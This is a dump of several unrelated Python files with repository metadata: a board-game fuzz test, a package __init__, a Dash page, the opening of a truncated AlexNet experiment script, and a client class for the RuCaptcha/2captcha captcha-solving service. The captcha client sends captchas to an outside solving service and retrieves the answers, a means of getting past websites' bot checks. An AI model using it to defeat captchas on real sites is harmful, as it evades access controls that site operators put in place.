2020-04-16T12:13:47.000Z
|
2020-04-16T12:13:47.000Z
|
z2/part2/interactive/jm/random_fuzzy_arrows_1/835134250.py
|
kozakusek/ipp-2020-testy
|
09aa008fa53d159672cc7cbf969a6b237e15a7b8
|
[
"MIT"
] | 18
|
2020-03-06T17:50:15.000Z
|
2020-05-19T14:58:30.000Z
|
z2/part2/interactive/jm/random_fuzzy_arrows_1/835134250.py
|
kozakusek/ipp-2020-testy
|
09aa008fa53d159672cc7cbf969a6b237e15a7b8
|
[
"MIT"
] | 18
|
2020-03-06T17:45:13.000Z
|
2020-06-09T19:18:31.000Z
|
from part1 import (
gamma_board,
gamma_busy_fields,
gamma_delete,
gamma_free_fields,
gamma_golden_move,
gamma_golden_possible,
gamma_move,
gamma_new,
)
"""
scenario: test_random_actions
uuid: 835134250
"""
"""
random actions, total chaos
"""
# Generated fuzz scenario "test_random_actions" (uuid 835134250): a fixed sequence
# of random moves on an 8x7 board with 5 players and 13 areas per player, with
# expected return values baked in. Comments only below; every statement is kept
# byte-identical so the recorded expectations stay valid.
board = gamma_new(8, 7, 5, 13)
assert board is not None
assert gamma_move(board, 1, 4, 1) == 1
assert gamma_move(board, 2, 6, 2) == 1
assert gamma_move(board, 2, 4, 2) == 1
assert gamma_free_fields(board, 2) == 53
assert gamma_move(board, 3, 3, 5) == 1
assert gamma_move(board, 3, 2, 1) == 1
assert gamma_busy_fields(board, 4) == 0
assert gamma_golden_possible(board, 4) == 1
assert gamma_move(board, 5, 2, 0) == 1
assert gamma_move(board, 5, 4, 3) == 1
assert gamma_move(board, 1, 3, 4) == 1
assert gamma_move(board, 2, 3, 6) == 1
assert gamma_move(board, 3, 4, 4) == 1
assert gamma_move(board, 3, 3, 3) == 1
assert gamma_golden_move(board, 3, 2, 4) == 0
assert gamma_move(board, 4, 6, 6) == 1
assert gamma_busy_fields(board, 4) == 1
assert gamma_move(board, 5, 4, 7) == 0
assert gamma_move(board, 1, 5, 6) == 1
assert gamma_move(board, 1, 0, 1) == 1
assert gamma_move(board, 2, 0, 1) == 0
assert gamma_move(board, 3, 4, 2) == 0
assert gamma_move(board, 3, 7, 4) == 1
assert gamma_move(board, 4, 6, 1) == 1
assert gamma_move(board, 4, 5, 3) == 1
assert gamma_move(board, 5, 0, 6) == 1
assert gamma_move(board, 2, 3, 1) == 1
assert gamma_move(board, 2, 5, 1) == 1
assert gamma_move(board, 3, 0, 3) == 1
assert gamma_busy_fields(board, 3) == 6
assert gamma_move(board, 4, 4, 0) == 1
assert gamma_move(board, 5, 6, 4) == 1
assert gamma_move(board, 5, 5, 5) == 1
assert gamma_move(board, 1, 0, 5) == 1
assert gamma_busy_fields(board, 1) == 5
assert gamma_golden_move(board, 1, 2, 4) == 0
assert gamma_move(board, 2, 5, 6) == 0
assert gamma_move(board, 2, 0, 2) == 1
assert gamma_move(board, 3, 1, 5) == 1
assert gamma_move(board, 3, 3, 3) == 0
assert gamma_move(board, 4, 5, 1) == 0
assert gamma_move(board, 5, 3, 2) == 1
assert gamma_busy_fields(board, 5) == 6
assert gamma_move(board, 1, 6, 6) == 0
assert gamma_golden_possible(board, 1) == 1
assert gamma_move(board, 2, 2, 3) == 1
assert gamma_golden_possible(board, 2) == 1
assert gamma_move(board, 3, 2, 2) == 1
assert gamma_move(board, 4, 6, 5) == 1
assert gamma_move(board, 4, 6, 1) == 0
assert gamma_free_fields(board, 4) == 25
assert gamma_move(board, 5, 2, 4) == 1
assert gamma_move(board, 5, 3, 3) == 0
assert gamma_golden_move(board, 5, 6, 3) == 0
assert gamma_move(board, 1, 7, 3) == 1
assert gamma_move(board, 2, 1, 5) == 0
assert gamma_move(board, 2, 6, 4) == 0
assert gamma_move(board, 3, 7, 2) == 1
assert gamma_busy_fields(board, 3) == 9
# First full-board snapshot check (row 0 of the string is the top row).
board501668135 = gamma_board(board)
assert board501668135 is not None
assert board501668135 == ("5..2.14.\n"
                          "13.3.54.\n"
                          "..513.53\n"
                          "3.2354.1\n"
                          "2.352.23\n"
                          "1.32124.\n"
                          "..5.4...\n")
del board501668135
board501668135 = None
assert gamma_busy_fields(board, 4) == 5
assert gamma_move(board, 5, 5, 7) == 0
assert gamma_move(board, 5, 4, 4) == 0
assert gamma_move(board, 1, 0, 6) == 0
assert gamma_move(board, 1, 5, 6) == 0
assert gamma_move(board, 2, 0, 7) == 0
assert gamma_move(board, 3, 0, 1) == 0
assert gamma_free_fields(board, 3) == 22
assert gamma_move(board, 4, 2, 5) == 1
assert gamma_move(board, 1, 4, 5) == 1
assert gamma_move(board, 2, 0, 1) == 0
assert gamma_move(board, 2, 2, 1) == 0
assert gamma_move(board, 3, 6, 1) == 0
assert gamma_move(board, 3, 1, 0) == 1
assert gamma_move(board, 4, 3, 6) == 0
assert gamma_move(board, 4, 7, 0) == 1
assert gamma_free_fields(board, 4) == 18
assert gamma_golden_move(board, 4, 5, 0) == 0
assert gamma_move(board, 5, 4, 0) == 0
assert gamma_move(board, 5, 2, 6) == 1
assert gamma_move(board, 1, 5, 2) == 1
assert gamma_free_fields(board, 1) == 16
assert gamma_move(board, 2, 6, 4) == 0
assert gamma_move(board, 2, 4, 0) == 0
# Second snapshot check.
board446793647 = gamma_board(board)
assert board446793647 is not None
assert board446793647 == ("5.52.14.\n"
                          "1343154.\n"
                          "..513.53\n"
                          "3.2354.1\n"
                          "2.352123\n"
                          "1.32124.\n"
                          ".35.4..4\n")
del board446793647
board446793647 = None
assert gamma_move(board, 3, 3, 1) == 0
assert gamma_move(board, 3, 2, 5) == 0
assert gamma_move(board, 4, 3, 1) == 0
assert gamma_move(board, 5, 5, 4) == 1
assert gamma_move(board, 5, 7, 5) == 1
assert gamma_move(board, 1, 4, 1) == 0
assert gamma_move(board, 1, 6, 5) == 0
assert gamma_busy_fields(board, 1) == 8
assert gamma_move(board, 2, 4, 6) == 1
assert gamma_busy_fields(board, 2) == 8
assert gamma_move(board, 3, 0, 5) == 0
assert gamma_busy_fields(board, 3) == 10
assert gamma_free_fields(board, 3) == 13
assert gamma_move(board, 4, 3, 5) == 0
assert gamma_golden_possible(board, 4) == 1
assert gamma_move(board, 5, 2, 6) == 0
assert gamma_move(board, 5, 4, 1) == 0
assert gamma_golden_possible(board, 5) == 1
assert gamma_move(board, 1, 4, 0) == 0
assert gamma_move(board, 2, 1, 4) == 1
assert gamma_move(board, 2, 0, 0) == 1
assert gamma_golden_possible(board, 2) == 1
assert gamma_move(board, 3, 2, 1) == 0
assert gamma_move(board, 4, 3, 6) == 0
assert gamma_move(board, 4, 0, 1) == 0
assert gamma_move(board, 5, 6, 5) == 0
assert gamma_move(board, 1, 3, 1) == 0
assert gamma_move(board, 3, 3, 6) == 0
assert gamma_move(board, 4, 3, 6) == 0
assert gamma_move(board, 5, 1, 4) == 0
assert gamma_move(board, 1, 5, 5) == 0
# Third snapshot check.
board453730818 = gamma_board(board)
assert board453730818 is not None
assert board453730818 == ("5.52214.\n"
                          "13431545\n"
                          ".2513553\n"
                          "3.2354.1\n"
                          "2.352123\n"
                          "1.32124.\n"
                          "235.4..4\n")
del board453730818
board453730818 = None
assert gamma_move(board, 2, 3, 6) == 0
assert gamma_move(board, 2, 2, 0) == 0
assert gamma_free_fields(board, 2) == 11
assert gamma_move(board, 3, 6, 1) == 0
assert gamma_busy_fields(board, 3) == 10
assert gamma_golden_move(board, 4, 3, 7) == 0
assert gamma_move(board, 5, 0, 5) == 0
assert gamma_move(board, 5, 1, 5) == 0
# Fourth snapshot: no successful move since the last one, so the board is unchanged.
board562456424 = gamma_board(board)
assert board562456424 is not None
assert board562456424 == ("5.52214.\n"
                          "13431545\n"
                          ".2513553\n"
                          "3.2354.1\n"
                          "2.352123\n"
                          "1.32124.\n"
                          "235.4..4\n")
del board562456424
board562456424 = None
assert gamma_move(board, 1, 4, 2) == 0
assert gamma_move(board, 1, 1, 3) == 1
assert gamma_free_fields(board, 1) == 10
assert gamma_move(board, 2, 3, 2) == 0
assert gamma_free_fields(board, 2) == 10
assert gamma_move(board, 3, 3, 2) == 0
assert gamma_move(board, 3, 1, 6) == 1
assert gamma_move(board, 4, 0, 6) == 0
assert gamma_move(board, 5, 0, 2) == 0
assert gamma_move(board, 1, 1, 7) == 0
assert gamma_golden_possible(board, 1) == 1
assert gamma_move(board, 2, 1, 0) == 0
assert gamma_busy_fields(board, 2) == 10
assert gamma_move(board, 3, 6, 6) == 0
assert gamma_move(board, 3, 0, 6) == 0
assert gamma_free_fields(board, 3) == 9
assert gamma_move(board, 4, 6, 7) == 0
assert gamma_move(board, 4, 7, 4) == 0
assert gamma_golden_possible(board, 4) == 1
# The only successful golden move of the scenario: player 4 captures (1, 3).
assert gamma_golden_move(board, 4, 1, 3) == 1
assert gamma_move(board, 5, 0, 5) == 0
assert gamma_move(board, 5, 2, 4) == 0
assert gamma_move(board, 1, 0, 3) == 0
assert gamma_move(board, 1, 0, 6) == 0
assert gamma_move(board, 2, 3, 6) == 0
assert gamma_golden_possible(board, 2) == 1
assert gamma_move(board, 3, 5, 5) == 0
assert gamma_move(board, 4, 3, 6) == 0
assert gamma_move(board, 5, 0, 3) == 0
assert gamma_move(board, 5, 3, 0) == 1
assert gamma_move(board, 1, 2, 3) == 0
assert gamma_move(board, 2, 4, 0) == 0
assert gamma_move(board, 3, 2, 1) == 0
assert gamma_move(board, 3, 4, 0) == 0
assert gamma_move(board, 4, 4, 0) == 0
assert gamma_free_fields(board, 4) == 8
assert gamma_move(board, 5, 2, 1) == 0
assert gamma_move(board, 1, 2, 1) == 0
assert gamma_move(board, 2, 3, 6) == 0
assert gamma_move(board, 2, 0, 4) == 1
assert gamma_move(board, 3, 0, 6) == 0
assert gamma_move(board, 5, 3, 6) == 0
assert gamma_move(board, 5, 3, 2) == 0
assert gamma_move(board, 1, 1, 1) == 1
assert gamma_move(board, 1, 7, 2) == 0
assert gamma_move(board, 2, 1, 7) == 0
assert gamma_move(board, 2, 3, 3) == 0
assert gamma_move(board, 3, 0, 1) == 0
assert gamma_move(board, 3, 3, 6) == 0
assert gamma_move(board, 4, 0, 5) == 0
assert gamma_move(board, 4, 1, 1) == 0
assert gamma_move(board, 5, 0, 5) == 0
assert gamma_busy_fields(board, 5) == 11
assert gamma_move(board, 1, 0, 6) == 0
# Fifth snapshot check.
board779428978 = gamma_board(board)
assert board779428978 is not None
assert board779428978 == ("5352214.\n"
                          "13431545\n"
                          "22513553\n"
                          "342354.1\n"
                          "2.352123\n"
                          "1132124.\n"
                          "23554..4\n")
del board779428978
board779428978 = None
assert gamma_move(board, 2, 2, 1) == 0
assert gamma_move(board, 3, 1, 7) == 0
assert gamma_move(board, 3, 3, 1) == 0
assert gamma_busy_fields(board, 3) == 11
assert gamma_golden_possible(board, 3) == 1
assert gamma_move(board, 4, 2, 1) == 0
# Sixth snapshot: identical to the fifth (no successful moves in between).
board764419175 = gamma_board(board)
assert board764419175 is not None
assert board764419175 == ("5352214.\n"
                          "13431545\n"
                          "22513553\n"
                          "342354.1\n"
                          "2.352123\n"
                          "1132124.\n"
                          "23554..4\n")
del board764419175
board764419175 = None
assert gamma_move(board, 5, 2, 4) == 0
assert gamma_golden_possible(board, 5) == 1
assert gamma_move(board, 1, 4, 0) == 0
assert gamma_move(board, 2, 1, 4) == 0
assert gamma_busy_fields(board, 2) == 11
assert gamma_move(board, 3, 0, 6) == 0
assert gamma_move(board, 3, 4, 0) == 0
assert gamma_free_fields(board, 3) == 6
assert gamma_golden_possible(board, 3) == 1
assert gamma_move(board, 4, 6, 6) == 0
assert gamma_move(board, 4, 5, 5) == 0
assert gamma_move(board, 5, 3, 6) == 0
assert gamma_move(board, 5, 1, 0) == 0
# Seventh snapshot: still unchanged.
board285942831 = gamma_board(board)
assert board285942831 is not None
assert board285942831 == ("5352214.\n"
                          "13431545\n"
                          "22513553\n"
                          "342354.1\n"
                          "2.352123\n"
                          "1132124.\n"
                          "23554..4\n")
del board285942831
board285942831 = None
assert gamma_move(board, 1, 0, 6) == 0
assert gamma_move(board, 1, 0, 0) == 0
assert gamma_golden_possible(board, 1) == 1
assert gamma_move(board, 2, 1, 7) == 0
assert gamma_move(board, 2, 2, 3) == 0
assert gamma_golden_move(board, 2, 4, 6) == 0
# Release the board resources allocated by gamma_new.
gamma_delete(board)
| 31.974843
| 46
| 0.663847
| 1,869
| 10,168
| 3.46656
| 0.038523
| 0.341256
| 0.356537
| 0.475382
| 0.835468
| 0.827751
| 0.729434
| 0.506251
| 0.423985
| 0.392808
| 0
| 0.164819
| 0.174764
| 10,168
| 317
| 47
| 32.07571
| 0.607317
| 0
| 0
| 0.333333
| 0
| 0
| 0.048611
| 0
| 0
| 0
| 0
| 0
| 0.742268
| 1
| 0
| false
| 0
| 0.003436
| 0
| 0.003436
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6572fe35d7f6aed1386b36c42d475fe2a5dbd3d3
| 315
|
py
|
Python
|
src/node/ext/ugm/__init__.py
|
zworkb/node.ext.ugm
|
896b1b9b115a875be86a5ba3fbad66c0c417d9ce
|
[
"BSD-3-Clause"
] | 1
|
2019-07-09T12:47:16.000Z
|
2019-07-09T12:47:16.000Z
|
src/node/ext/ugm/__init__.py
|
zworkb/node.ext.ugm
|
896b1b9b115a875be86a5ba3fbad66c0c417d9ce
|
[
"BSD-3-Clause"
] | null | null | null |
src/node/ext/ugm/__init__.py
|
zworkb/node.ext.ugm
|
896b1b9b115a875be86a5ba3fbad66c0c417d9ce
|
[
"BSD-3-Clause"
] | 1
|
2020-12-22T10:36:03.000Z
|
2020-12-22T10:36:03.000Z
|
from node.ext.ugm._api import Group # noqa
from node.ext.ugm._api import Groups # noqa
from node.ext.ugm._api import Principal # noqa
from node.ext.ugm._api import Principals # noqa
from node.ext.ugm._api import Ugm # noqa
from node.ext.ugm._api import User # noqa
from node.ext.ugm._api import Users # noqa
| 39.375
| 48
| 0.755556
| 56
| 315
| 4.125
| 0.232143
| 0.242424
| 0.333333
| 0.424242
| 0.800866
| 0.800866
| 0.701299
| 0
| 0
| 0
| 0
| 0
| 0.155556
| 315
| 7
| 49
| 45
| 0.868421
| 0.107937
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 10
|
657b42430178b4c0926116c69ec02a5c5d289b80
| 8,530
|
py
|
Python
|
python_rucaptcha/TextCaptcha.py
|
MasterScott/python-rucaptcha
|
187e06511384dbbd52d16d68056c7b7b0c5ab5a3
|
[
"MIT"
] | 70
|
2017-08-04T14:20:19.000Z
|
2022-02-26T21:13:09.000Z
|
python_rucaptcha/TextCaptcha.py
|
MasterScott/python-rucaptcha
|
187e06511384dbbd52d16d68056c7b7b0c5ab5a3
|
[
"MIT"
] | 56
|
2017-08-05T22:51:01.000Z
|
2022-03-25T10:47:57.000Z
|
python_rucaptcha/TextCaptcha.py
|
MasterScott/python-rucaptcha
|
187e06511384dbbd52d16d68056c7b7b0c5ab5a3
|
[
"MIT"
] | 28
|
2017-08-08T11:21:12.000Z
|
2022-03-27T12:39:19.000Z
|
import time
import asyncio
import aiohttp
import requests
from python_rucaptcha.config import app_key
from python_rucaptcha.decorators import api_key_check, service_check
from python_rucaptcha.result_handler import get_sync_result, get_async_result
class TextCaptcha:
    # Synchronous solver for RuCaptcha/2captcha text captchas.
    def __init__(
        self,
        rucaptcha_key: str,
        sleep_time: int = 5,
        service_type: str = "2captcha",
        pingback: str = None,
        **kwargs,
    ):
        """
        Initialize the required state.

        :param rucaptcha_key: Captcha API key from the user's account
        :param sleep_time: How long to wait for the captcha solution
        :param service_type: Which service URL the program will work with;
            either "2captcha" (the default) or "rucaptcha"
        :param pingback: URL on which the callback answer from RuCaptcha will be awaited
        :param kwargs: Any extra parameters to forward to the service
        """
        # time to wait for the captcha solution
        self.sleep_time = sleep_time
        # which service URL the library will work with
        self.service_type = service_type
        # payload of the POST request that submits the captcha to the server
        self.post_payload = {"key": rucaptcha_key, "method": "post", "json": 1, "soft_id": app_key}
        # if a callback parameter was passed - add it
        if pingback:
            self.post_payload.update({"pingback": pingback})
        # if extra parameters were passed - merge them into post_payload
        if kwargs:
            for key in kwargs:
                self.post_payload.update({key: kwargs[key]})
        # payload of the GET request that polls for the solution result
        self.get_payload = {"key": rucaptcha_key, "action": "get", "json": 1}

    def __enter__(self):
        # Context-manager support; nothing to acquire.
        return self

    def __exit__(self, exc_type, exc_value, traceback):
        # Returning False re-raises any exception from the `with` block.
        if exc_type:
            return False
        return True

    @api_key_check
    @service_check
    def captcha_handler(self, captcha_text: str, **kwargs):
        """
        Submit the captcha data to the server for solving.

        :param captcha_text: The text question to solve
        :param kwargs: Any extra parameters to forward to the service
        :return: The answer as a JSON string with the fields:
            captchaSolve - the captcha solution,
            taskId - the Id of the solving task, usable for complaints and the like,
            error - False if everything is fine, True if an error occurred,
            errorBody - the name of the error
        """
        # result, url_request, url_response are set by the `service_check` decorator
        # after the given service name has been validated.
        # If extra parameters were passed - merge them into get_payload
        if kwargs:
            for key in kwargs:
                self.get_payload.update({key: kwargs[key]})
        # attach the captcha text, use the POST method and await the answer in JSON format
        self.post_payload.update({"textcaptcha": captcha_text})
        # Send the captcha text to the service and wait for the answer;
        # the result is a JSON response carrying the id of the captcha being solved
        captcha_id = requests.post(self.url_request, data=self.post_payload).json()
        # if the answer came back with an error - record it and return the result
        if captcha_id["status"] == 0:
            self.result.update({"error": True, "errorBody": captcha_id["request"]})
            return self.result
        # otherwise take the key of the submitted captcha and wait for the solution
        else:
            captcha_id = captcha_id["request"]
            # store the key of the submitted captcha as taskId
            self.result.update({"taskId": captcha_id})
            # refresh the payload with the key of the submitted captcha
            self.get_payload.update({"id": captcha_id})
            # if a `pingback` parameter was given - do not wait for the solution,
            # return the not-yet-filled answer instead
            if self.post_payload.get("pingback"):
                return self.get_payload
            else:
                # Wait for the captcha to be solved
                time.sleep(self.sleep_time)
                return get_sync_result(
                    get_payload=self.get_payload,
                    sleep_time=self.sleep_time,
                    url_response=self.url_response,
                    result=self.result,
                )
# асинхронный метод для решения текстовой капчи
# asynchronous class for solving a text captcha
class aioTextCaptcha:
    def __init__(
        self,
        rucaptcha_key: str,
        sleep_time: int = 5,
        service_type: str = "2captcha",
        pingback: str = None,
        **kwargs,
    ):
        """
        Initialize the required state.

        :param rucaptcha_key: Captcha API key from the user's account
        :param sleep_time: How long to wait for the captcha solution
        :param service_type: Which service URL the program will work with;
            either "2captcha" (the default) or "rucaptcha"
        :param pingback: URL on which the callback answer from RuCaptcha will be awaited
        :param kwargs: Any extra parameters to forward to the service
        """
        # time to wait for the captcha solution
        self.sleep_time = sleep_time
        # which service URL the library will work with
        self.service_type = service_type
        # payload of the POST request that submits the captcha to the server
        self.post_payload = {"key": rucaptcha_key, "method": "post", "json": 1, "soft_id": app_key}
        # if a callback parameter was passed - add it
        if pingback:
            self.post_payload.update({"pingback": pingback})
        # if extra parameters were passed - merge them into post_payload
        if kwargs:
            for key in kwargs:
                self.post_payload.update({key: kwargs[key]})
        # payload of the GET request that polls for the solution result
        self.get_payload = {"key": rucaptcha_key, "action": "get", "json": 1}

    def __enter__(self):
        # Context-manager support; nothing to acquire.
        return self

    def __exit__(self, exc_type, exc_value, traceback):
        # Returning False re-raises any exception from the `with` block.
        if exc_type:
            return False
        return True

    @api_key_check
    @service_check
    async def captcha_handler(self, captcha_text: str, **kwargs):
        """
        Submit the captcha data to the server for solving.

        :param captcha_text: The text question to solve
        :param kwargs: Any extra parameters to forward to the service
        :return: The answer as a JSON string with the fields:
            captchaSolve - the captcha solution,
            taskId - the Id of the solving task, usable for complaints and the like,
            error - False if everything is fine, True if an error occurred,
            errorBody - the name of the error
        """
        # result, url_request, url_response are set by the `service_check` decorator
        # after the given service name has been validated.
        # If extra parameters were passed - merge them into get_payload
        if kwargs:
            for key in kwargs:
                self.get_payload.update({key: kwargs[key]})
        # attach the captcha text, use the POST method and await the answer in JSON format
        self.post_payload.update({"textcaptcha": captcha_text})
        # obtain the captcha ID
        async with aiohttp.ClientSession() as session:
            async with session.post(self.url_request, data=self.post_payload) as resp:
                captcha_id = await resp.json()
        # if the answer came back with an error - record it and return the result
        if captcha_id["status"] == 0:
            self.result.update({"error": True, "errorBody": captcha_id["request"]})
            return self.result
        # otherwise take the key of the submitted captcha and wait for the solution
        else:
            captcha_id = captcha_id["request"]
            # store the key of the submitted captcha as taskId
            self.result.update({"taskId": captcha_id})
            # refresh the payload with the key of the submitted captcha
            self.get_payload.update({"id": captcha_id})
            # if a `pingback` parameter was given - do not wait for the solution,
            # return the not-yet-filled answer instead
            if self.post_payload.get("pingback"):
                return self.get_payload
            else:
                # Wait for the captcha to be solved
                await asyncio.sleep(self.sleep_time)
                return await get_async_result(
                    get_payload=self.get_payload,
                    sleep_time=self.sleep_time,
                    url_response=self.url_response,
                    result=self.result,
                )
| 41.813725
| 120
| 0.634818
| 1,002
| 8,530
| 5.256487
| 0.190619
| 0.023923
| 0.034175
| 0.023923
| 0.90469
| 0.891209
| 0.891209
| 0.891209
| 0.87716
| 0.87716
| 0
| 0.001996
| 0.295311
| 8,530
| 203
| 121
| 42.019704
| 0.874231
| 0.398945
| 0
| 0.803738
| 0
| 0
| 0.051125
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.065421
| false
| 0
| 0.065421
| 0.018692
| 0.261682
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
65dda4a624a4c8719b0c4847139fe34c1af632c4
| 86
|
py
|
Python
|
lib/pages/hello.py
|
students-using-ai-for-good/people-matcher
|
5d247f9cf32d59c8d629a5be4bf998fa3a96c9aa
|
[
"MIT"
] | 1
|
2020-06-20T05:38:50.000Z
|
2020-06-20T05:38:50.000Z
|
lib/pages/hello.py
|
students-using-ai-for-good/people-matcher
|
5d247f9cf32d59c8d629a5be4bf998fa3a96c9aa
|
[
"MIT"
] | null | null | null |
lib/pages/hello.py
|
students-using-ai-for-good/people-matcher
|
5d247f9cf32d59c8d629a5be4bf998fa3a96c9aa
|
[
"MIT"
] | 1
|
2020-11-08T04:04:33.000Z
|
2020-11-08T04:04:33.000Z
|
import dash_html_components as html
def get_layout():
    """Return the static Dash layout for this page: a single greeting Div."""
    greeting = html.Div("Hello!")
    return greeting
| 14.333333
| 35
| 0.732558
| 13
| 86
| 4.615385
| 0.846154
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.162791
| 86
| 5
| 36
| 17.2
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0.069767
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
02a2d0f6638fd7a10e7643497804d59184f06e46
| 72,453
|
py
|
Python
|
src/smaller_variants_AlexNet_experiment.py
|
aslansd/DNNforVPL
|
7cda3eb327050f98b0867a4eca4cadb813d2c466
|
[
"MIT"
] | null | null | null |
src/smaller_variants_AlexNet_experiment.py
|
aslansd/DNNforVPL
|
7cda3eb327050f98b0867a4eca4cadb813d2c466
|
[
"MIT"
] | null | null | null |
src/smaller_variants_AlexNet_experiment.py
|
aslansd/DNNforVPL
|
7cda3eb327050f98b0867a4eca4cadb813d2c466
|
[
"MIT"
] | null | null | null |
"""
Created by Aslan Satary Dizaji (a.satarydizaji@eni-g.de)
"""
import copy
import gc
import glob
import numpy as np
import os
import random
import scipy.io
import shutil
import time
import torch
import torch.backends.cudnn as cudnn
import torch.nn as nn
import torch.optim
import torchvision.transforms as transforms
from PIL import Image
from scipy.spatial.distance import pdist, squareform
from torch.hub import load_state_dict_from_url
from intrinsic_dimension_2NN import estimate
from smaller_variants_AlexNet_model import DNNforVPL_1, DNNforVPL_2, DNNforVPL_3, DNNforVPL_4, DNNforVPL_5
from reading_stimuli import reading_stimuli
# The pretrained weights of AlexNet
# NOTE(review): this downloads the checkpoint at import time, so importing this
# module requires network access (or a warm torch hub cache) — confirm intended.
model_urls = {'alexnet': 'https://download.pytorch.org/models/alexnet-owt-4df8aa71.pth'}
pretrained_dict = load_state_dict_from_url(model_urls['alexnet'])
### A class for formatting different metrics of accuracy during training and transfer
class AverageMeter(object):
    """Tracks the most recent value together with a running sum/count/average."""

    def __init__(self, name, fmt = ':f'):
        # `fmt` is a str.format spec (e.g. ':f', ':.3f') applied to `val`.
        self.name = name
        self.fmt = fmt
        self.reset()

    def reset(self):
        """Zero out all tracked statistics."""
        self.val = 0
        self.avg = 0
        self.sum = 0
        self.count = 0

    def update(self, val, n = 1):
        """Record `val`, weighted by `n` samples, and refresh the running average."""
        self.val = val
        self.sum += val * n
        self.count += n
        self.avg = self.sum / self.count

    def __str__(self):
        template = '{name} {val' + self.fmt + '}'
        if self.name == 'Accuracy':
            # Accuracy values are tensors; unwrap them to plain Python numbers
            # so str.format can render them.
            self.val = self.val.item()
            self.avg = self.avg.item()
            self.sum = self.sum.item()
        return template.format(**self.__dict__)
### A class for showing a progress bar during training and transfer
class ProgressMeter(object):
    """Prints tab-separated progress lines like '[ 12/100] <meter> <meter>'."""

    def __init__(self, num_batches, meters, prefix = ""):
        # Pre-build the '[current/total]' format string once.
        self.batch_fmtstr = self._get_batch_fmtstr(num_batches)
        self.meters = meters
        self.prefix = prefix

    def display(self, batch):
        """Print one progress line for the given batch index."""
        parts = [self.prefix + self.batch_fmtstr.format(batch)]
        parts.extend(str(meter) for meter in self.meters)
        print('\t'.join(parts))

    def _get_batch_fmtstr(self, num_batches):
        # Right-align the current batch number to the width of the total.
        width = len(str(num_batches // 1))
        slot = '{:' + str(width) + 'd}'
        return '[' + slot + '/' + slot.format(num_batches) + ']'
### A function for computing accuracy during training and transfer
def accuracy(output, target, topk = 1):
    """Computes the accuracy over the top-k predictions.

    Args:
        output: (batch, num_classes) score tensor.
        target: (batch,) tensor of ground-truth class indices.
        topk (int): a prediction counts as correct if the target appears among
            the `topk` highest-scoring classes. Defaults to 1 (previously this
            parameter was accepted but ignored).

    Returns:
        list: a single-element list holding a 1-element tensor with the
        percentage (0-100) of correct predictions.
    """
    with torch.no_grad():
        batch_size = target.size(0)
        # Indices of the top-k classes per sample, then transpose to (k, batch).
        _, pred = output.topk(topk, 1, True, True)
        pred = pred.t()
        # Broadcast-compare each of the k predictions against the target row.
        correct = pred.eq(target.view(1, -1).expand_as(pred))
        res = []
        # A sample is correct if any of its top-k predictions hit the target.
        correct_k = correct[:topk].reshape(-1).float().sum(0, keepdim = True)
        res.append(correct_k.mul_(100.0 / batch_size))
        return res
### A function for adjusting the learning rate during training
def adjust_learning_rate(optimizer, session, lr):
    """Sets the learning rate to the initial LR halved once per session.

    Args:
        optimizer: optimizer whose `param_groups` are updated in place.
        session (int): zero-based session index; each session halves the rate.
        lr (float): the initial (session-0) learning rate.
    """
    decayed = lr * (0.5 ** (session))
    for group in optimizer.param_groups:
        group['lr'] = decayed
### A function for saving the checkpoints during training
def save_checkpoint(state, is_best, group, filename):
    """Persist a training checkpoint; additionally mirror it as the per-group
    best checkpoint when `is_best` is set.

    Args:
        state: serializable training state passed to torch.save.
        is_best (bool): whether this checkpoint is the best seen so far.
        group (str): group tag embedded in the best-checkpoint filename.
        filename (str): destination path for the checkpoint.
    """
    torch.save(state, filename)
    if not is_best:
        return
    # Keep a stable copy of the best checkpoint for this group.
    shutil.copyfile(filename, 'DNNforVPL_best_' + group + '.pth.tar')
### A fucntion which performs different experiments with the smaller variants of AlexNet
def smaller_variants_alexnet(parent_folder = 'Smaller Variants of Alexnet_New Results', number_simulation = 5, num_sample_artiphysiology = 1000):
### Initializing the main variables
x_sample_artiphysiology_index = np.zeros((num_sample_artiphysiology, 3), dtype = np.int64)
for i in range(0, num_sample_artiphysiology):
x_sample_artiphysiology_index[i, 0] = random.randrange(1)
x_sample_artiphysiology_index[i, 1] = random.randrange(20)
x_sample_artiphysiology_index[i, 2] = random.randrange(180)
number_model = 5
number_group = 4
all_simulation_training_accuracy = []
all_simulation_transfer_accuracy = []
all_simulation_all_ID = []
all_x_sample_ID = []
all_simulation_training_accuracy_permuted = []
all_simulation_all_ID_permuted = []
for i in range(number_model):
number_layer = number_model
all_simulation_training_accuracy.append(np.zeros((number_simulation, number_group, 180), dtype = np.float32))
all_simulation_transfer_accuracy.append(np.zeros((number_simulation, number_group, 10), dtype = np.float32))
all_simulation_all_ID.append(np.zeros((number_simulation, number_group, number_layer, 19), dtype = np.float32))
all_x_sample_ID.append(np.zeros((number_simulation, number_group), dtype = np.float32))
